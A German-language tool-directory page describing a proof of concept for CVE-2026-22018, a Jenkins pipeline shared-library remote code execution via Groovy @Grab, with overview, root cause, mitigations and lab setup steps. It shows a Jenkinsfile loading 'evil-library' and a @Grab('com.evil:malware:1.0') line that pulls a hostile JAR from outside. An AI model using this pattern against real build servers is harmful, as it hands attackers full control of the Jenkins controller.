Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-22018-Jenkins-Pipeline-Shared-Library-Code-Execution-via-Grab- — PoC für CVE-2026-22018, eine kritische Jenkins-Pipeline-Shared-Library-RCE über Groovy @Grab, zur Demonstration von Supply-Chain-Code-Injektion und Gegenmaßnahmen. | Kitploit
Tools/GitHubGitHub/george0papasotiriou/cve-2026-22018-jenkins-pipeline-shared-library-code-execution-via-grab-
SchwachstellenanalyseExploitationWebanwendungs-ExploitationDevSecOpsLieferkettensicherheit
GitHubgeorge0papasotiriou/cve-2026-22018-jenkins-pipeline-shared-library-code-execution-via-grab-

CVE-2026-22018-Jenkins-Pipeline-Shared-Library-Code-Execution-via-Grab-

PoC für CVE-2026-22018, eine kritische Jenkins-Pipeline-Shared-Library-RCE über Groovy @Grab, zur Demonstration von Supply-Chain-Code-Injektion und Gegenmaßnahmen.

Repository anzeigen
2vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-22018 – Jenkins Pipeline Shared Library: Codeausführung über @Grab

Programmcode (Groovy-Pipeline)

root@kitploit:~
// Jenkinsfile - loads untrusted shared library
@Library('evil-library@master') _
node {
    evilStep()
}

CVE-2026-22018 – Jenkins Pipeline Shared Library: Remote-Codeausführung

Severity: Critical

Übersicht

Eine Jenkins-Pipeline lädt eine Shared Library aus einer nicht vollständig vertrauenswürdigen Quelle. Die Bibliothek verwendet die @Grab-Annotation, um externe Maven-Artefakte herunterzuladen, die eine schädliche Klasse enthalten können, die während der Groovy-Kompilierung Code auf dem Jenkins-Controller ausführt.

Details zur Schwachstelle

  • Typ: Code Injection / Supply Chain
  • Auswirkung: Vollständige Kompromittierung des Jenkins-Controllers.
  • Grundursache: Die @Grab-Annotation von Groovy ruft zur Laufzeit beliebige JARs ab und lädt sie; Shared Libraries sind nicht in einer Sandbox isoliert.

Exploit-Demonstration

Konfigurieren Sie eine Pipeline mit einer nicht vertrauenswürdigen Bibliothek, die in ihrer Datei vars/evilStep.groovy den Aufruf @Grab('com.evil:malware:1.0') enthält. Wenn die Pipeline ausgeführt wird, wird der statische Initialisierer der schädlichen JAR-Datei ausgeführt.

Gegenmaßnahmen

  • Verwenden Sie ausschließlich Shared Libraries aus vertrauenswürdigen, signierten SCM-Repositories.
  • Deaktivieren Sie @Grab über die Sicherheitseinstellungen der Groovy-Sandbox.
  • Verwenden Sie die Pipeline-Option „Load implicitly“ mit Vorsicht.

Installation & Verwendung

root@kitploit:~
git clone https://github.com/yourorg/CVE-2026-22018.git
cd CVE-2026-22018
# Set up Jenkins in a lab environment to test.
Tool herunterladen